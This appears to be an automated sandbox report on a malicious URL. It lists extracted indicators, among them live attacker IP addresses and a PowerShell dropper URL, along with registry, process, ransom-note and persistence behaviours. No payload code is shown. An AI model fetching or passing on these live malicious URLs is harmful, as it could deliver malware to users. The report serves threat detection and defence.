hxxp://94[.]156[.]69[.]35[:]222

Resubmissions

07-03-2024 11:55

240307-n3vzcaae56 10

07-03-2024 08:02

240307-jw8jmsfc87 10

Analysis

max time kernel
599s
max time network
591s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07-03-2024 08:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://94.156.69.35:222

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://91.92.254.77:222/jj.jpg

Signatures

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

559 5924 powershell.exe
563 6016 powershell.exe
564 5548 powershell.exe
565 2588 powershell.exe
566 1688 powershell.exe

flow	pid	process
559	5924	powershell.exe
563	6016	powershell.exe
564	5548	powershell.exe
565	2588	powershell.exe
566	1688	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	CScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

558 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
558	api.ipify.org

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133542721470229662"	chrome.exe

Modifies registry class 64 IoCs

Processes:

chrome.exechrome.exechrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000db89bb4ac668da0120c40f4ed168da01e13a85516670da0114000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "6"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Pictures"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "9"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	chrome.exe

Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

Notepad.exeNOTEPAD.EXE

pid process

3216 Notepad.exe
1796 NOTEPAD.EXE

pid	process
3216	Notepad.exe
1796	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 53 IoCs

Processes:

chrome.exepowershell.exepowershell.exechrome.exepowershell.exepowershell.exepowershell_ise.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell_ise.exepowershell_ise.exe

pid	process
3224	chrome.exe
3224	chrome.exe
5112	powershell.exe
5112	powershell.exe
5112	powershell.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
4804	chrome.exe
4804	chrome.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
5428	powershell.exe
5428	powershell.exe
5428	powershell.exe
5056	powershell_ise.exe
5056	powershell_ise.exe
5056	powershell_ise.exe
4396	powershell.exe
4396	powershell.exe
4396	powershell.exe
5924	powershell.exe
5924	powershell.exe
5924	powershell.exe
1836	powershell.exe
1836	powershell.exe
1836	powershell.exe
6016	powershell.exe
6016	powershell.exe
6016	powershell.exe
1152	powershell.exe
1152	powershell.exe
1152	powershell.exe
5548	powershell.exe
5548	powershell.exe
5548	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
2588	powershell.exe
2588	powershell.exe
2588	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
4328	powershell_ise.exe
4328	powershell_ise.exe
5480	powershell_ise.exe
5480	powershell_ise.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

chrome.exe

pid process

2072 chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

chrome.exe

pid process

3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe

pid	process
2072	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe
Token: SeShutdownPrivilege	3224	chrome.exe
Token: SeCreatePagefilePrivilege	3224	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

chrome.exe7zG.exeNOTEPAD.EXE

pid	process
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
5244	7zG.exe
1796	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe
3224	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

chrome.exechrome.exe

pid process

2436 chrome.exe
2436 chrome.exe
2072 chrome.exe

pid	process
2436	chrome.exe
2436	chrome.exe
2072	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3224 wrote to memory of 116	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 116	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3192	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3496	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3496	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe
PID 3224 wrote to memory of 3464	3224	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://94.156.69.35:222
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
